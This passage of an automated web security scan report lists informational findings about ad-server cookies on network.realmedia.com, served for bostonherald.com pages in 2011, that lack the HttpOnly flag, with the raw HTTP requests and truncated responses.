P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:11 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.457. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (the cookie name is visible in the Set-Cookie header of the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:39:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:44 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...

11.458. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:18:57 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:00 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.459. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:02:19 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:22 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.460. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:18 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:21 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.461. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:06:27 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1428
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:57:29 GMT;path=/

document.write ('<iframe src="http://view.atdmt.com/MDS/iview/289553367/direct/01/857611358?click=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/
...[SNIP]...

11.462. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:35:25 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1428
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:26:28 GMT;path=/

document.write ('<iframe src="http://view.atdmt.com/MDS/iview/289553367/direct/01/219928446?click=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/
...[SNIP]...

11.463. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:10:43 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:46 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.464. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:23:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3621
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:07 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.465. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:51 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:53 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.466. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:36 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2979
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 06:22:37 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

11.467. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: RMFD, NSC_o1efm_qppm_iuuq. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
